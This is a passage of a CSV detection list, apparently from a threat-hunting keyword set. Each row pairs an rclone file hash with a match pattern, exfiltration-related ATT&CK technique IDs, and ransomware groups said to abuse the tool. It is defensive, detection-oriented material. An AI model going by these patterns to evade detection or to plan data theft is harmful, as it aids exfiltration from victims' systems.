Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2680466b47990133f0b027e2aabb9febf182dccc7d9ee4b8d3bd2c269d90b846*",".{0,1000}2680466b47990133f0b027e2aabb9febf182dccc7d9ee4b8d3bd2c269d90b846.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2680ff90db43500e97f1ed688ed181cdbc68a46cbaa5dba1b89425463a3a799e*",".{0,1000}2680ff90db43500e97f1ed688ed181cdbc68a46cbaa5dba1b89425463a3a799e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*26c05dc5ac0adf3089e93cbd32107eec6bad9393ade5fb2eca16c45dfb9e470a*",".{0,1000}26c05dc5ac0adf3089e93cbd32107eec6bad9393ade5fb2eca16c45dfb9e470a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*26c7897855af56fb122a0aee9b6854033db315c3235d559ff06e8071acdfc415*",".{0,1000}26c7897855af56fb122a0aee9b6854033db315c3235d559ff06e8071acdfc415.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*273bae67f00d98e35f0ae1680307a5daf0bc4c1e3cb489ff2b7a46d54e2f53a3*",".{0,1000}273bae67f00d98e35f0ae1680307a5daf0bc4c1e3cb489ff2b7a46d54e2f53a3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*275c6b94849c1dc71f0cc30458339dbef40425657a28cda057074dc5d9105823*",".{0,1000}275c6b94849c1dc71f0cc30458339dbef40425657a28cda057074dc5d9105823.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*277f4ea11b12862715088dec3890ed9b54190d7f7f6614652ab87daeff4c4cd7*",".{0,1000}277f4ea11b12862715088dec3890ed9b54190d7f7f6614652ab87daeff4c4cd7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2782da062a67ebf7e34e50c839dead0be150295484d4e408e06e8498f1d5c818*",".{0,1000}2782da062a67ebf7e34e50c839dead0be150295484d4e408e06e8498f1d5c818.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*27ab19246f4b8686e96698d8412174e75ad957781e0c6b6ffb49680d26b440f3*",".{0,1000}27ab19246f4b8686e96698d8412174e75ad957781e0c6b6ffb49680d26b440f3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*27ba0db8c304b4135bc1398f90e5c975ba4f62aeb148e544a4c1a563dce5ef0b*",".{0,1000}27ba0db8c304b4135bc1398f90e5c975ba4f62aeb148e544a4c1a563dce5ef0b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*27c034a6397d29d882e8d6339d6dab65abda6c28a5f1b43babc05bd67f5cb8d6*",".{0,1000}27c034a6397d29d882e8d6339d6dab65abda6c28a5f1b43babc05bd67f5cb8d6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*27f2630140201c66ce90182677f6fd305a33baa304034fd47e5f4b78ea66123f*",".{0,1000}27f2630140201c66ce90182677f6fd305a33baa304034fd47e5f4b78ea66123f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*27f59f2bcc5b8938d0c3d2d080e15ee67ce8c9a44147b52da52d1183afdd8ce7*",".{0,1000}27f59f2bcc5b8938d0c3d2d080e15ee67ce8c9a44147b52da52d1183afdd8ce7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*27f98f852adcf7b03f7a0802cd61d3a6410adf16946bc406c3ac8d586cfec7cb*",".{0,1000}27f98f852adcf7b03f7a0802cd61d3a6410adf16946bc406c3ac8d586cfec7cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*281629712ccd9fdb0fceff799ddf2dd64e5eb154ef52d9ef145fc4a765800374*",".{0,1000}281629712ccd9fdb0fceff799ddf2dd64e5eb154ef52d9ef145fc4a765800374.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*286a7037bf3d357e80c5535e726e89cc6d157f449762228c6bbf79410eb9431b*",".{0,1000}286a7037bf3d357e80c5535e726e89cc6d157f449762228c6bbf79410eb9431b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*28b8907df12cb866c627f7dd3a692326e073384ceb5e99328007941026bb73b8*",".{0,1000}28b8907df12cb866c627f7dd3a692326e073384ceb5e99328007941026bb73b8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*28db376098fd00a050c065ffbbfc5e4d878cea412ce4b3dbc3c45c5c96dfee4f*",".{0,1000}28db376098fd00a050c065ffbbfc5e4d878cea412ce4b3dbc3c45c5c96dfee4f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*28f49a724fc8017ef9255fc720eaf31a58d77acd8f86466ab185c833294cc7bf*",".{0,1000}28f49a724fc8017ef9255fc720eaf31a58d77acd8f86466ab185c833294cc7bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*290747f485b0a88e1d2b5d97eefcb63625b068724b0b76204be7223321ffae2d*",".{0,1000}290747f485b0a88e1d2b5d97eefcb63625b068724b0b76204be7223321ffae2d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2936b4e711e8becd5535dcab878af7c30479f81e16292b6e044b0f0b8cd945b6*",".{0,1000}2936b4e711e8becd5535dcab878af7c30479f81e16292b6e044b0f0b8cd945b6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2939e97fe8966ded6f0f9962071dde0c2116972dbfdfb778a18b8879ff944df8*",".{0,1000}2939e97fe8966ded6f0f9962071dde0c2116972dbfdfb778a18b8879ff944df8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*298f130b43988ad5a32abb7b59c45387adfc221ce675f98e367caa917dd5c1ff*",".{0,1000}298f130b43988ad5a32abb7b59c45387adfc221ce675f98e367caa917dd5c1ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*29b98f2475d297bbf04c80cf85182968b061aba8f326074c5d20af735eb9475d*",".{0,1000}29b98f2475d297bbf04c80cf85182968b061aba8f326074c5d20af735eb9475d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2a04a254f60255c10998f74be9d320740df82525a7d16d8ceebab57627137b44*",".{0,1000}2a04a254f60255c10998f74be9d320740df82525a7d16d8ceebab57627137b44.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2a447f956591e96269715dd5e27ec36cb1cabe61d45de5ee590b43adae67ce5f*",".{0,1000}2a447f956591e96269715dd5e27ec36cb1cabe61d45de5ee590b43adae67ce5f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2a62cd957adb970baa5fd244856516952c33194ae336a49f9b6727561cc48928*",".{0,1000}2a62cd957adb970baa5fd244856516952c33194ae336a49f9b6727561cc48928.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2ac10f7ff25fac8a1d34f54b0b87bf14de6ae482dc2691fd273702971dd61704*",".{0,1000}2ac10f7ff25fac8a1d34f54b0b87bf14de6ae482dc2691fd273702971dd61704.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2ac214f54f3286db611d416155cb40569f6932fdb45a1e384dac201c5f41a9ff*",".{0,1000}2ac214f54f3286db611d416155cb40569f6932fdb45a1e384dac201c5f41a9ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2ac5bb5e54dcd346f6ede08e1b380127ee89d879a2336ef6f6c296cf378a0c86*",".{0,1000}2ac5bb5e54dcd346f6ede08e1b380127ee89d879a2336ef6f6c296cf378a0c86.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2acd831051f89004586e5e59b33bf951f338671697def433d22b6c3c5ba0cde6*",".{0,1000}2acd831051f89004586e5e59b33bf951f338671697def433d22b6c3c5ba0cde6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2ae5e02519c7da40c09e81ab02be9151336872b3f65cb39a917d53fa742d9241*",".{0,1000}2ae5e02519c7da40c09e81ab02be9151336872b3f65cb39a917d53fa742d9241.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2b0898db6823fb2d533e7f7f1dbc19ec25ccd87f552b19e046ebcbf13c0efe3c*",".{0,1000}2b0898db6823fb2d533e7f7f1dbc19ec25ccd87f552b19e046ebcbf13c0efe3c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2b13ba11cc9a18e558083ee33b7694fd4f1977bff70fd253687757fc92079ff6*",".{0,1000}2b13ba11cc9a18e558083ee33b7694fd4f1977bff70fd253687757fc92079ff6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2b44981a1a7d1f432c53c0f2f0b6bcdd410f6491c47dc55428fdac0b85c763f1*",".{0,1000}2b44981a1a7d1f432c53c0f2f0b6bcdd410f6491c47dc55428fdac0b85c763f1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2b5b31aa845de53f3410b452a02bd47d83e4358c53c6e7ae71c4e83386ef690f*",".{0,1000}2b5b31aa845de53f3410b452a02bd47d83e4358c53c6e7ae71c4e83386ef690f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 